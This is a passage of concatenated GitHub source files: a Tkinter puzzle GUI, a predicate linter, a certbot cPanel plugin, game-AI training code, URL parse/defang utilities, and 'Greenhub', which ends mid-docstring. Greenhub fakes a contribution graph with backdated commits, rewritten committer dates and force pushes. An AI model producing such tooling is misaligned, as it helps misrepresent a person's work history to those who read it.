image=self.__robots[r])
for (d, x, y) in board.barriers:
(img, dx, dy) = self.__barriers[d]
self.__canvas.create_image(
self.__margin + self.__tile_size * x + dx,
self.__margin + self.__tile_size * y + dy,
anchor=Tkinter.NW,
image=img)
self.__solve_button = self.__canvas.create_text(
board.size * self.__tile_size / 2 + self.__margin,
(0.5 + board.size) * self.__tile_size + 2 * self.__margin,
text="Solve!",
activefill="blue",
state=Tkinter.HIDDEN)
self.__solving_text = self.__canvas.create_text(
board.size * self.__tile_size / 2 + self.__margin,
(0.5 + board.size) * self.__tile_size + 2 * self.__margin,
text="Solving...",
state=Tkinter.HIDDEN)
self.__canvas.bind('<Motion>', self.__mouse_move_event)
self.__canvas.bind('<Button-1>', self.__mouse_click_event)
def __mouse_over(self, tag, mx, my):
if self.__canvas.itemcget(tag, "state") == Tkinter.HIDDEN:
return False
x, y, xx, yy = self.__canvas.bbox(tag)
return mx >= x and mx < xx and \
my >= y and my < yy
def __mouse_over_triangle(self, tag, mx, my, dx, dy):
if self.__mouse_over(tag, mx, my):
px, py = self.__canvas.coords(tag)
px = (mx - px) / self.__tile_size
py = (my - py) / self.__tile_size
rx = px - py
ry = px + py - 1
if (dx - dy) * rx < 0 and (dx + dy) * ry < 0:
return True
return False
def __mouse_click_event(self, e):
clicked = set()
for (x, y), t in self.__target_images.items():
if self.__mouse_over(t, e.x, e.y):
clicked.add(("target", (x, y)))
for (t, val) in self.__direction_images:
r, x, y, dx, dy = val
if self.__mouse_over_triangle(t, e.x, e.y, dx, dy):
clicked.add(("robot", val))
if self.__mouse_over(self.__solve_button, e.x, e.y):
clicked.add(("solve", None))
for tag, val in clicked:
for slot in self.__slots.get(tag, []):
slot("click", val)
def __mouse_move_event(self, e):
entered = set()
for ((x, y), t) in self.__target_images.items():
if self.__mouse_over(t, e.x, e.y):
entered.add(("target", (x, y)))
for (t, val) in self.__direction_images:
r, x, y, dx, dy = val
if self.__mouse_over_triangle(t, e.x, e.y, dx, dy):
entered.add(("robot", val))
for (tag, val) in self.__entered - entered:
for slot in self.__slots.get(tag, []):
slot("leave", val)
for (tag, val) in entered - self.__entered:
for slot in self.__slots.get(tag, []):
slot("enter", val)
self.__entered = entered
def highlight(self, x, y, active):
if active and not (x, y) in self.__highlights:
m = 8
xx = self.__margin + x * self.__tile_size + m
yy = self.__margin + y * self.__tile_size + m
self.__highlights[(x, y)] = self.__canvas.create_rectangle(
(xx, yy, xx + self.__tile_size - 2 * m, yy + self.__tile_size - 2 * m),
width=3,
outline="blue")
elif not active and (x, y) in self.__highlights:
self.__canvas.delete(self.__highlights[(x, y)])
del self.__highlights[(x, y)]
def highlight_direction(self, x, y, dx, dy, active):
if active and not (x, y, dx, dy) in self.__highlights:
m = 8
xx = self.__margin + x * self.__tile_size + m
yy = self.__margin + y * self.__tile_size + m
xxx = xx + self.__tile_size - 2 * m
yyy = yy + self.__tile_size - 2 * m
cx = xx + (xxx - xx) / 2
cy = yy + (yyy - yy) / 2
if dx == -1: xx, xxx = xxx, xx
if dy == -1: yy, yyy = yyy, yy
if dy == 0: xxx = xx
if dx == 0: yyy = yy
self.__highlights[(x, y, dx, dy)] = self.__canvas.create_polygon(
(xx, yy, xxx, yyy, cx, cy),
width=3,
outline="blue",
fill="")
elif not active and (x, y, dx, dy) in self.__highlights:
self.__canvas.delete(self.__highlights[(x, y, dx, dy)])
del self.__highlights[(x, y, dx, dy)]
def clear_highlights(self):
for p in self.__highlights.values():
self.__canvas.delete(p)
self.__highlights = {}
def connect_target_event(self, slot):
self.__slots.setdefault("target", []).append(slot)
def connect_robot_event(self, slot):
self.__slots.setdefault("robot", []).append(slot)
def connect_solve_event(self, slot):
self.__slots.setdefault("solve", []).append(slot)
def update_board(self, board):
self.clear_directions()
for (r, (x, y)) in board.pos.items():
ox, oy = self.__canvas.coords(self.__robot_images[r])
self.__canvas.move(
self.__robot_images[r],
self.__margin + self.__tile_size * x - ox,
self.__margin + self.__tile_size * y - oy)
for dx, dy in [(1,0), (0,1), (-1,0), (0,-1)]:
xx = x + dx
yy = y + dy
if not (x, y, dx, dy) in board.blocked and not (xx, yy) in board.pos.values():
self.__direction_images.append((
self.__canvas.create_image(
self.__margin + self.__tile_size * xx,
self.__margin + self.__tile_size * yy,
anchor=Tkinter.NW,
image=self.__moves_short[r, dx, dy]),
(r, x, y, dx, dy)))
for tag in self.__solution_images:
self.__canvas.delete(tag)
self.__solution_images = []
if board.solution is not None:
i = 0
for (r, x, y, _) in board.solution:
self.__solution_images.append(
self.__canvas.create_image(
self.__margin + i * self.__tile_size,
2 * self.__margin + self.__tile_size * board.size,
anchor=Tkinter.NW,
image=self.__moves[(r, x, y)]))
i += 1
def enable_solve(self, board, state):
self.__canvas.itemconfigure(self.__solve_button, state=Tkinter.NORMAL if state == "enabled" else Tkinter.HIDDEN)
self.__canvas.itemconfigure(self.__solving_text, state=Tkinter.NORMAL if state == "busy" else Tkinter.HIDDEN)
def update_target(self, board):
for (t, m, x, y) in board.targets:
self.__canvas.itemconfig(self.__target_images[(x, y)], state=Tkinter.NORMAL if board.current_target is None else Tkinter.HIDDEN)
if board.current_target is not None:
self.__canvas.itemconfig(self.__target_images[board.current_target[2], board.current_target[3]], state=Tkinter.NORMAL)
def clear_directions(self):
for (tag, _) in self.__direction_images:
self.__canvas.delete(tag)
self.__direction_images = []
# {{{1 Application
class Main:
def __init__(self):
self.__master = Tkinter.Tk()
self.__board = Board()
self.__solver = Solver()
self.__canvas = Visualization(self.__master, self.__board)
#self.__master.bind("<Left>", self.__canvas.on_previous) # would be nice to have these two bindings as an undo/redo stack
#self.__master.bind("<Right>", self.__canvas.on_next)
self.__master.bind("<Escape>", lambda x: self.__master.quit())
self.__canvas.update_target(self.__board)
self.__canvas.connect_target_event(self.target_event)
self.__canvas.connect_robot_event(self.robot_event)
self.__canvas.connect_solve_event(self.solve_event)
def target_event(self, event, pos):
x, y = pos
if self.__board.current_target is None:
if event == "enter":
self.__canvas.highlight(x, y, True)
elif event == "leave":
self.__canvas.highlight(x, y, False)
elif event == "click":
for t in self.__board.targets:
if t[2] == x and t[3] == y:
self.__board.current_target = t
self.__canvas.update_target(self.__board)
self.__update_board()
def __update_board(self):
self.__canvas.clear_highlights()
self.__canvas.update_board(self.__board)
won = self.__board.won()
if won:
self.__board.current_target = None
self.__canvas.clear_directions()
self.__canvas.update_target(self.__board)
self.__canvas.enable_solve(self.__board, "enabled" if not won and self.__board.solution is None else "disabled")
def robot_event(self, event, pos):
r, x, y, dx, dy = pos
if event == "enter":
self.__canvas.highlight_direction(x+dx, y+dy, dx, dy, True)
elif event == "leave":
self.__canvas.highlight_direction(x+dx, y+dy, dx, dy, False)
else:
self.__solver.stop()
self.__board.move(r, dx, dy)
self.__update_board()
def solve_event(self, event, ignore):
self.__solver.start(self.__board)
self.__canvas.enable_solve(self.__board, "busy")
self.__master.after(500, self.timer_event)
def timer_event(self):
if self.__solver.busy():
self.__master.after(500, self.timer_event)
else:
self.__board.solution = self.__solver.get()
self.__update_board()
def run(self):
Tkinter.mainloop()
# {{{1 main
app = Main()
app.run()
``` |
{
"source": "0x326/miami-university-cse-464-group-project",
"score": 3
} |
#### File: miami-university-cse-464-group-project/game-logic/lint_predicates.py
```python
import re
import sys
from pathlib import Path
from typing import *
from typing import TextIO
try:
import colorful
except ImportError:
def identity(string: str) -> str:
return string
class ColorfulDummy:
def __getattr__(self, item):
return identity
colorful = ColorfulDummy()
else:
colorful.use_style('solarized')
predicate_re = re.compile(r'([a-z]\S*)\((.+)\)')
predicate_annotation_re = re.compile(r'^%\s*([a-z]\S*)\((.+)\)\.')
predicate_argument_re = re.compile(r'(".*?[^\\]"|".*?\\"|\d+|\w+),?')
class Predicate(NamedTuple):
name: str
arguments: Sequence[str]
def match_predicate_annotation(string: str) -> Optional[Predicate]:
"""
Finds a single predicate annotation
:param string: The string to search
:return: The parsed annotation
"""
match = predicate_annotation_re.search(string)
if match:
name, arguments = match.groups()
arguments = predicate_argument_re.finditer(arguments)
arguments = (argument.group(1) for argument in arguments)
return Predicate(name=name, arguments=tuple(arguments))
else:
return None
def match_predicates(file: TextIO) -> Iterator[Tuple[int, Predicate]]:
"""
Finds predicates
:param file: The file to search
:return: The predicates and the line number on which they are found
"""
for line_number, line in enumerate(file, start=1):
for match in predicate_re.finditer(line):
name, arguments = match.groups()
arguments = predicate_argument_re.finditer(arguments)
arguments = (argument.group(1) for argument in arguments)
yield line_number, Predicate(name=name, arguments=tuple(arguments))
def print_message(message: str, file_name: str, line_number: int):
"""
Convenience function to prepend a file name and line number before printing
:param message: The message to print
:param file_name: The name of the file that generated this message
:param line_number: The line number that generated this message
"""
print(f'{colorful.violet(file_name)}:{colorful.blue(line_number)}: {message}')
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(description='Compute an optimal deck given a set of booster packs')
parser.add_argument('files', metavar='FILES', nargs='+', type=Path,
help='The .lp files to lint')
args = parser.parse_args()
# Since this program's purpose is to check predicate arity,
# assume there is only one predicate per identifier
predicate_signatures: Dict[str, Sequence[str]] = {}
# Scan for predicate annotations
for file_path in args.files:
with open(file_path) as file:
for line in file:
predicate = match_predicate_annotation(line)
if predicate:
predicate_signatures[predicate.name] = predicate.arguments
# Scan codebase for violations
violations_found = False
for file_path in args.files:
with open(file_path) as file:
for line_number, predicate in match_predicates(file):
actual_arity = len(predicate.arguments)
try:
expected_arity = len(predicate_signatures[predicate.name])
assert expected_arity == actual_arity
except KeyError:
# Missing annotation
predicate_signature = colorful.bold_yellow(f'{predicate.name}/{actual_arity}')
print_message(colorful.yellow(f'Missing annotation for {predicate_signature}'),
file_name=file_path, line_number=line_number)
violations_found = True
except AssertionError:
# Annotation violation
actual_signature = colorful.bold_red(f'{predicate.name}/{actual_arity}')
expected_signature = colorful.bold_red(f'{predicate.name}/{expected_arity}')
print_message(colorful.red(f'{actual_signature} should be {expected_signature}'),
file_name=file_path, line_number=line_number)
violations_found = True
if violations_found:
sys.exit(1)
``` |
{
"source": "0x3333/certbot-cpanel",
"score": 3
} |
#### File: certbot-cpanel/certbot_cpanel/cpanel.py
```python
import logging
import base64
import json
try:
# python 3
from urllib.request import urlopen, Request
from urllib.parse import urlencode
except ImportError:
# python 2
from urllib import urlencode
from urllib2 import urlopen, Request
from certbot import errors
logger = logging.getLogger(__name__)
class CPanelClient:
"""Encapsulate communications with the cPanel API 2"""
def __init__(self, url, username, password, token):
self.request_url = "%s/json-api/cpanel" % url
self.data = {
'cpanel_jsonapi_user': username,
'cpanel_jsonapi_apiversion': '2',
}
if token:
self.headers = {
'Authorization': 'cpanel %s:%s' % (username, token)
}
else:
self.headers = {
'Authorization': 'Basic %s' % base64.b64encode(
("%s:%s" % (username, password)).encode()).decode('utf8')
}
def add_txt_record(self, record_name, record_content, record_ttl=60):
"""Add a TXT record
:param str record_name: the domain name to add
:param str record_content: the content of the TXT record to add
:param int record_ttl: the TTL of the record to add
"""
cpanel_zone, cpanel_name = self._get_zone_and_name(record_name)
data = self.data.copy()
data['cpanel_jsonapi_module'] = 'ZoneEdit'
data['cpanel_jsonapi_func'] = 'add_zone_record'
data['domain'] = cpanel_zone
data['name'] = cpanel_name
data['type'] = 'TXT'
data['txtdata'] = record_content
data['ttl'] = record_ttl
response = urlopen(
Request(
"%s?%s" % (self.request_url, urlencode(data)),
headers=self.headers,
)
)
response_data = json.load(response)['cpanelresult']
logger.debug(response_data)
if response_data['data'][0]['result']['status'] == 1:
logger.info("Successfully added TXT record for %s", record_name)
else:
raise errors.PluginError("Error adding TXT record: %s" % response_data['data'][0]['result']['statusmsg'])
def del_txt_record(self, record_name, record_content, record_ttl=60):
"""Remove a TXT record
:param str record_name: the domain name to remove
:param str record_content: the content of the TXT record to remove
:param int record_ttl: the TTL of the record to remove
"""
cpanel_zone, _ = self._get_zone_and_name(record_name)
record_lines = self._get_record_line(cpanel_zone, record_name, record_content, record_ttl)
data = self.data.copy()
data['cpanel_jsonapi_module'] = 'ZoneEdit'
data['cpanel_jsonapi_func'] = 'remove_zone_record'
data['domain'] = cpanel_zone
# the lines get shifted when we remove one, so we reverse-sort to avoid that
record_lines.sort(reverse=True)
for record_line in record_lines:
data['line'] = record_line
response = urlopen(
Request(
"%s?%s" % (self.request_url, urlencode(data)),
headers=self.headers
)
)
response_data = json.load(response)['cpanelresult']
logger.debug(response_data)
if response_data['data'][0]['result']['status'] == 1:
logger.info("Successfully removed TXT record for %s", record_name)
else:
raise errors.PluginError("Error removing TXT record: %s" % response_data['data'][0]['result']['statusmsg'])
def install_crt(self, domain, cabundle, crt, key):
"""Install a certificate in a domain
:param str domain: the domain to use the certificate
:param str cabundle: the CA Bundle of the certificate
:param str crt: the domain's certificate
:param str key: the certificate's key
"""
# cpanel_zone, cpanel_name = self._get_zone_and_name(record_name)
data = self.data.copy()
data['cpanel_jsonapi_module'] = 'SSL'
data['cpanel_jsonapi_func'] = 'installssl'
data['domain'] = domain
data['cabundle'] = cabundle
data['crt'] = crt
data['key'] = key
response = urlopen(
Request(
"%s?%s" % (self.request_url, urlencode(data)),
headers=self.headers,
)
)
response_data = json.load(response)['cpanelresult']
logger.debug(response_data)
if response_data['data'][0]['result'] == 1:
logger.info("Successfully installed SSL certificate for %s", domain)
else:
raise errors.PluginError("Error installing SSL certificate: %s" % response_data['data'][0]['result']['output'])
def _get_zone_and_name(self, record_domain):
"""Find a suitable zone for a domain
:param str record_name: the domain name
:returns: (the zone, the name in the zone)
:rtype: tuple
"""
cpanel_zone = ''
cpanel_name = ''
data = self.data.copy()
data['cpanel_jsonapi_module'] = 'ZoneEdit'
data['cpanel_jsonapi_func'] = 'fetchzones'
response = urlopen(
Request(
"%s?%s" % (self.request_url, urlencode(data)),
headers=self.headers
)
)
response_data = json.load(response)['cpanelresult']
logger.debug(response_data)
matching_zones = {zone for zone in response_data['data'][0]['zones'] if response_data['data'][0]['zones'][zone] and (record_domain == zone or record_domain.endswith('.' + zone))}
if matching_zones:
cpanel_zone = max(matching_zones, key = len)
cpanel_name = record_domain[:-len(cpanel_zone)-1]
else:
raise errors.PluginError("Could not get the zone for %s. Is this name in a zone managed in cPanel?" % record_domain)
return (cpanel_zone, cpanel_name)
def _get_record_line(self, cpanel_zone, record_name, record_content, record_ttl):
"""Find the line numbers of a record a zone
:param str cpanel_zone: the zone of the record
:param str record_name: the name in the zone of the record
:param str record_content: the content of the record
:param str cpanel_ttl: the ttl of the record
:returns: the line number and all it's duplicates
:rtype: list
"""
record_lines = []
data = self.data.copy()
data['cpanel_jsonapi_module'] = 'ZoneEdit'
data['cpanel_jsonapi_func'] = 'fetchzone_records'
data['domain'] = cpanel_zone
data['name'] = record_name + '.' if not record_name.endswith('.') else ''
data['type'] = 'TXT'
data['txtdata'] = record_content
data['ttl'] = record_ttl
response = urlopen(
Request(
"%s?%s" % (self.request_url, urlencode(data)),
headers=self.headers
)
)
response_data = json.load(response)['cpanelresult']
logger.debug(response_data)
record_lines = [int(d['line']) for d in response_data['data']]
return record_lines
``` |
{
"source": "0x384c0/alpha-zero-general",
"score": 3
} |
#### File: tk/test/testTKGame.py
```python
import unittest
import sys
sys.path.append('..')
from ..TKLogic import Board
from ..TKGame import TKGame as Game, display
from utils import *
class TestTKGame(unittest.TestCase):
def setUp(self):
self.game = Game()
self.board = Board()
self.display = display
def tearDown(self):
self.board = None
def testCanonicalForm(self):
board = self.board.execute_move(0, 1)
canonical_form_p1 = self.game.getCanonicalForm(board, 1)
valids_p1 = self.game.getValidMoves(canonical_form_p1,1)
self.assertEqual(valids_p1.tolist(), [1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0])
canonical_form_p2 = self.game.getCanonicalForm(board, -1)
valids_p2 = self.game.getValidMoves(canonical_form_p2,1)
self.assertEqual(valids_p2.tolist(), [0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1])
if __name__ == '__main__':
unittest.main()
```
#### File: 0x384c0/alpha-zero-general/train_with_heuristic.py
```python
import random
import copy
import numpy as np
from tk.TKPlayers import HeuristicPlayer
from tk.TKGame import TKGame as Game
from tk.TKGame import Board, WIN_SCORE
from tk.keras.NNet import NNetWrapper as nn
from tk.test.testTKLogick import generate_encoded_state, parse_encoded_state
from tk.keras.NNet import NNetWrapper as NNet
from keras.utils import Progbar
from utils import *
NUM_ITERS = number_of_train_iterations()
NUM_STEPS = 1000
INVALID_ACTION_REWARD = -1
def random_argmax(array):
MAX_DIFF = 2
arg_max = np.argmax(array)
max_value = array[arg_max]
max_value_ids = [arg_max,arg_max,arg_max]
for idx, value in enumerate(array):
if value != INVALID_ACTION_REWARD and max_value - value <= MAX_DIFF:
max_value_ids.append(idx)
return random.choice(max_value_ids)
def generate_train_batch(num_steps):
input_boards = []
target_pis = []
target_vs = []
board = Board()
game = Game()
heuristicPlayer = HeuristicPlayer()
player = 1
print("generate_train_batch")
progbar = Progbar(num_steps)
for x in range(num_steps):
progbar.add(1)
encoded_state = board.get_encoded_state()
canonical_form = game.getCanonicalForm(encoded_state, player)
best_action = heuristicPlayer.play(canonical_form)
game_ended = game.getGameEnded(encoded_state, player)
if game_ended == 0:
input_board = game.getCanonicalForm( copy.deepcopy(encoded_state), player)
encoded_state = board.execute_move(best_action, player)
score = board.get_players_scores()[player]
action_onehot = number_to_onehot(best_action,Board.action_size)
win_probability = float(score) / float(WIN_SCORE)
player *= -1
input_boards.append(input_board)
target_pis.append(action_onehot)
target_vs.append(win_probability)
# print("\n")
# print(parse_encoded_state(input_board))
# print("best_action " + str(best_action))
else:
player == 1
board = Board() # no valid actions or game ended, reset board
encoded_state = board.get_encoded_state()
return input_boards, target_pis, target_vs
#test
# batch = generate_train_batch(NUM_STEPS)
# exit()
# training
g = Game()
n1 = NNet(g)
n1.load_checkpoint('temp',"best.pth.tar")
n1.nnet.model._make_predict_function()
for i in range(NUM_ITERS):
print("iteration " + str(i) + " / " + str(NUM_ITERS))
input_boards, target_pis, target_vs = generate_train_batch(NUM_STEPS)
input_boards = np.asarray(input_boards)
target_pis = np.asarray(target_pis)
target_vs = np.asarray(target_vs)
n1.nnet.model.fit(x = input_boards, y = [target_pis, target_vs], batch_size = int(NUM_STEPS * .6), epochs = 5)
if i % 5 == 0:
n1.save_checkpoint('temp',"best.pth.tar")
loss = n1.nnet.model.test_on_batch(x = input_boards, y = [target_pis, target_vs])
print(loss)
``` |
{
"source": "0x384c0/Experiments-RL",
"score": 3
} |
#### File: keras-rl/game_th/Env.py
```python
import gym
from gym import spaces
import numpy as np
from Game import Game,GameResult
from GameHistory import GameHistory
class Env():
def __init__(self,game):
self._game = game
self.action_space = spaces.Discrete(self._game.get_num_actions())
self._game_history = GameHistory(shape=self._game.state_shape())
# self.observation_space = spaces.Box(low=0, high=self._game.max_state_value(), dtype=np.uint8, shape=(self.STATE_HISTORY_SIZE,) + self._game.state_shape()) # TODO: remove if not used
def step(self, action):
reward_enum = self._game.send_key(action)
self._game_history.put(self._game.get_state())
reward = reward_enum.value
observation = self._game_history.get()
done = reward_enum != GameResult.none
info = {"action": action}
return observation, reward, done, info
def reset(self):
self._game.reset()
self._game_history.reset()
self._game_history.put(self._game.get_state())
observation = self._game_history.get()
return observation
def render(self):
self._game.render()
def get_shape_with_history(self):
return self._game_history.shape_with_history
```
#### File: keras-rl/game_th/PlayerHuman.py
```python
from helpers.helper_keyboard import getch
class PlayerHuman():
def __init__(self,game):
self.game = game
def get_input(self,game_state):
pressed_key = getch()
if pressed_key == "q":
self.game.stop() # stty sane
exit()
action_id = self.game.action_id_for_action(pressed_key)
return action_id
```
#### File: simple_Q_learn/game/HumanPlayer.py
```python
import sys
sys.path.append('..')
from helpers.helper_keyboard import getch
class HumanPlayer():
def get_input(self):
return getch()
```
#### File: simple_Q_learn/game_th/Game.py
```python
import numpy as np
import sys
import curses
import traceback
import copy
from collections import namedtuple
from helpers.utils import *
from GameClasses import *
RENDER = True# not is_train_mode()
FIELD_SIZE = Size(40,20) # w,h
START_PLAYER_POSITION = Point(FIELD_SIZE.w/2,0) #x,y
WIN_TIME = int(FIELD_SIZE.h * 3)
#game objects
sym_player = "P"
sym_bullet = "*"
sym_bonus = "+"
sym_empty = " "
#keys
left_key = "a"
right_key = "d"
up_key = "w"
down_key = "s"
none_key = "*"
actions = [left_key,right_key,up_key,down_key,none_key]
vocab = {
sym_empty:0,
sym_player:1,
sym_bullet:2,
sym_bonus:3,
}
vocab_rev = {v: k for k, v in vocab.items()}
# generating vocabs ids
class Game():
__myscreen = curses.initscr() if RENDER else None
def __update_game_state(self):
self.__game_state = np.zeros(FIELD_SIZE.shape()) # empty
self.__game_state[self.__player_position.x][self.__player_position.y] = vocab[sym_player]
self.__animation_time += 1
# emit bullets
for emitter in self.__emitters:
bullet = emitter.emit(self.__animation_time,self.__bullets)
# move or delete bullets
bullet_for_deleting = []
for bullet in self.__bullets:
bullet.move(self.__animation_time)
if bullet.origin.x >= 0 and bullet.origin.x < FIELD_SIZE.w and bullet.origin.y >= 0 and bullet.origin.y < FIELD_SIZE.h:
self.__game_state[bullet.origin.x][bullet.origin.y] = vocab[sym_bullet]
else:
bullet_for_deleting.append(bullet)
self.__bullets = [x for x in self.__bullets if x not in bullet_for_deleting]
def __del__(self):
self.stop()
# public
def print_controls(self):
if RENDER:
self.__myscreen.addstr("q - quit, left_key - {}, right_key - {}, up_key - {}, down_key - {}".format(left_key,right_key,up_key,down_key))
def reset(self):
origin = Point(FIELD_SIZE.w/2, FIELD_SIZE.h * 0.8)
self.__animation_time = 0
self.__emitters = [
CircleWithHoleBulletEmitter(origin, PI * -0.5, PI * 1.2, 0.5, 12)
# VarAngleBulletEmitter(origin, PI * 0., PI * 1.2, 30, True, 1, 1),
# VarAngleBulletEmitter(origin, PI * 2., PI * 0.8, 30, False, 1, 1),
# CircleBulletEmitter(origin, 10, 1, 6),
]
self.__bullets = []
self.__player_position = copy.copy(START_PLAYER_POSITION)
self.__update_game_state()
def render(self):
if RENDER:
y_offset = 2
self.__myscreen.addstr(y_offset - 1,0,"animation_time: " + str(self.__animation_time) + " WIN_TIME: " + str(WIN_TIME) + " ")
for x in range(FIELD_SIZE.w):
for y in range(FIELD_SIZE.h):
sym = vocab_rev[int(self.__game_state[x][y])]
y_rev = FIELD_SIZE.h - 1 - y
self.__myscreen.addstr(y_rev + y_offset,x,sym)
self.__myscreen.addstr("\n")
self.__myscreen.refresh()
def send_key(self,pressed_key):
if pressed_key == "q":
if RENDER:
curses.endwin() # stty sane
exit()
if pressed_key == up_key:
self.__player_position.y += 1
if pressed_key == down_key:
self.__player_position.y -= 1
if pressed_key == left_key:
self.__player_position.x -= 1
if pressed_key == right_key:
self.__player_position.x += 1
self.__player_position.x = clamp(self.__player_position.x,0,FIELD_SIZE.w - 1)
self.__player_position.y = clamp(self.__player_position.y,0,FIELD_SIZE.h - 1)
self.__update_game_state()
for bullet in self.__bullets:
if self.__player_position == bullet.origin:
self.reset()
return GameResult.los
if self.__animation_time % WIN_TIME == 0:
return GameResult.win
return GameResult.none
# aiplayer requirements
def get_actions(self):
return actions
def get_num_actions(self):
return len(actions)
def state_shape(self):
NUM_OF_IMAGE_CHANNELS = 1
return (NUM_OF_IMAGE_CHANNELS,) + FIELD_SIZE.shape()
def get_state(self):
return state_with_channels(self.__game_state)
def get_train_data(self,action_id):
animation_time = self.__animation_time
emitters = copy.deepcopy(self.__emitters)
bullets = copy.deepcopy(self.__bullets)
player_position = copy.copy(self.__player_position)
old_state = np.copy(self.__game_state)
reward = self.send_key(actions[action_id])
new_state = np.copy(self.__game_state)
game_over = reward != GameResult.none
self.__animation_time = animation_time
self.__emitters = emitters
self.__bullets = bullets
self.__player_position = player_position
self.__game_state = np.copy(old_state)
return state_with_channels(old_state), action_id, reward, state_with_channels(new_state), game_over
def stop(self):
if RENDER:
curses.endwin()
def state_with_channels(data):
return np.expand_dims(data, axis=0)
``` |
{
"source": "0x3a/hostparse",
"score": 3
} |
#### File: hostparse/hostparse/hostparse.py
```python
import os
import sys
import difflib
import argparse
from itertools import tee
# py3 "compatible"
try:
import urlparse
except:
import urllib.parse as urlparse
import tldextract
"""
The tool is very simple and just maps -known- arguments through an objector dict.
It might not be pretty but its surprisingly efficient.
"""
# Taken from: https://mail.python.org/pipermail/tutor/2003-November/026645.html
class Unbuffered(object):
def __init__(self, stream):
self.stream = stream
def write(self, data):
self.stream.write(data)
self.stream.flush()
def writelines(self, datas):
self.stream.writelines(datas)
self.stream.flush()
def __getattr__(self, attr):
return getattr(self.stream, attr)
# Remove buffering, processing large datasets eats memory otherwise
sys.stdout = Unbuffered(sys.stdout)
# Taken from https://goodcode.io/articles/python-dict-object/
class ObjDict(dict):
def from_dict(self, d):
for key, value in d.items():
self[key] = value
return self
def __getattr__(self, name):
if name in self:
return self[name]
else:
raise AttributeError("No such attribute: " + name)
def __setattr__(self, name, value):
self[name] = value
def __delattr__(self, name):
if name in self:
del self[name]
else:
raise AttributeError("No such attribute: " + name)
def parse_url(url):
o = ObjDict()
p_url = urlparse.urlparse(url)
t_url = tldextract.extract(url)
o.filename = p_url.path.split("/")[-1]
o.scheme = p_url.scheme
o.username = p_url.username
o.password = p_url.password
o.subdomain = t_url.subdomain
o.domain = t_url.domain
o.tld = t_url.suffix
o.hostname = p_url.hostname
o.suffix = t_url.suffix
o.port = p_url.port
o.path = p_url.path
o.params = p_url.params
o.query = p_url.query
o.fragment = p_url.fragment
return o
KEYWORDS = [
'username',
'domain',
'fragment',
'query',
'path',
'password',
'port',
'subdomain',
'hostname',
'filename',
'params',
'tld',
'scheme'
]
def process_args():
parser = argparse.ArgumentParser(prog='hostparse')
parser.add_argument('-d', '--delimiter', dest='delim', default='.', help="Output delimiter.")
parser.add_argument('format', nargs=None,
help="Format keywords seperated by a comma. Keywords: scheme, username, password, subdomain, \
domain, hostname, tld, port, path, filename, params, query, fragment. It matches the shortest \
match (ho is hostname, t is tld, p is unknown, po is port).")
args = parser.parse_args()
format_str = []
for format_keyword in args.format.split(','):
km = [item for item in KEYWORDS if item.startswith(format_keyword)]
if len(km) > 1:
parser.error("Supplied format key '{k}' isn't specific enough, matches multiple keywords ({m}).".format(k=format_keyword, m=','.join(km)))
if len(km) < 1:
parser.error("Supplied format key '{k}' doesn't match any keyword.".format(k=format_keyword))
format_str.append(km[0])
return format_str, args.delim
def main():
format_str, delim = process_args()
for line in sys.stdin:
line = line.rstrip()
print(delim.join([getattr(parse_url(line), fk) for fk in format_str]))
``` |
{
"source": "0x3a/pydefang",
"score": 3
} |
#### File: pydefang/defang/lib.py
```python
import re
mappings = [
('.', '[.]'),
(':', '[:]'),
('http', 'hxxp'),
('ftp', 'fxp'),
]
def defang(url):
for k, v in mappings:
url = re.sub(re.escape(k), v, url, flags=re.I)
return url
def refang(url):
for k, v in mappings:
url = re.sub(re.escape(v), k, url, flags=re.I)
return url
``` |
{
"source": "0x3fc/greenhub",
"score": 3
} |
#### File: greenhub/Greenhub/Greenhub.py
```python
from os import path
from subprocess import call
import random
from Greenhub.Date import Date
from Greenhub.Graph import Graph
class Greenhub:
file_name = 'green.hub'
def __init__(self):
"""
create commit file if not exists
"""
if not path.isfile(self.file_name):
open(self.file_name, 'w')
@staticmethod
def commit_graph(name=None, base_commit_times=0):
"""
commit according to a given graph
Args:
name (str): the file name of the graph
base_commit_times (int): for all non zero commit, add this number of commit times
"""
# get the first date of Github contribution graph
first_date = Greenhub.get_first_date()
# get the processed graph
graph = Graph.process(first_date, name)
# commit graph
for date, commit_times in graph.items():
# repeat commit times
for commit in range(commit_times + base_commit_times):
# commit on the date
Greenhub.commit(date)
@staticmethod
def commit_everyday(start_date=None, commit_count_range=None):
"""
commit everyday from a start date so the time line in github shows green
Args:
start_date (str) : the start date
commit_count_range (list): the range of the commit times (e.g. [1, 5]: will commit randomly once to five
times)
"""
# set start date to the Github contribution first date if start date is not specified
if start_date is None:
start_date = Greenhub.get_first_date()
else:
start_date = Date(start_date)
# commit everyday until now
Greenhub.commit_in_range(start_date, Date().tomorrow(), commit_count_range)
@staticmethod
def filter_commit_date():
"""
change the commit date to author date
"""
# git filter-branch --env-filter 'export GIT_COMMITTER_DATE="$GIT_AUTHOR_DATE"'
call(['git', 'filter-branch', '--env-filter', """export GIT_COMMITTER_DATE="$GIT_AUTHOR_DATE" """])
@staticmethod
def push(force=False):
"""
push changes to github
Args:
force (bool): when true, do a force push
"""
push_commit = ['git', 'push']
if force:
push_commit.append('--force')
call(push_commit)
@staticmethod
def commit_in_range(start_date, end_date, commit_count_range=None):
"""
commit from start date til end date (include start date, exclude end date)
Args:
start_date (Date): the start date (inclusive: will have commit on this date)
end_date (Date): the end date (exclusive: will not have commit on this date)
commit_count_range (list): the range of the commit times (e.g. [1, 5]: will commit randomly once to five
times)
"""
# check if start date is larger than end date
if start_date > end_date:
return
if commit_count_range is None:
commit_count_range = [1, 1]
# commit start date and move to next date until reaches end date
while start_date != end_date:
for commit_times in range(0, random.randint(commit_count_range[0], commit_count_range[1])):
Greenhub.commit(str(start_date))
start_date.tomorrow()
@staticmethod
def commit(date):
"""
commit a file and change the date to the given date
Args:
date (str): the commit date with date format
"""
# update file
Greenhub.write(date)
# git add {file_name}
call(['git', 'add', Greenhub.file_name])
# git commit -m "{date}" --date="{date}"
call(['git', 'commit', '-m', "%s" % date, '--date="%s"' % date])
@staticmethod
def write(date):
"""
write green hub file a date and a random number
Args:
date (str): the date that will appear in the file
"""
# set file content to a date time with a random number
content = '%s: %f' % (date, random.random())
# update file with the content
with open(Greenhub.file_name, 'w') as file:
file.write(content)
@staticmethod
def get_first_date():
"""
calculate the first date of the Github page contribution
Returns:
Date: the first date shown in the Github page contribution
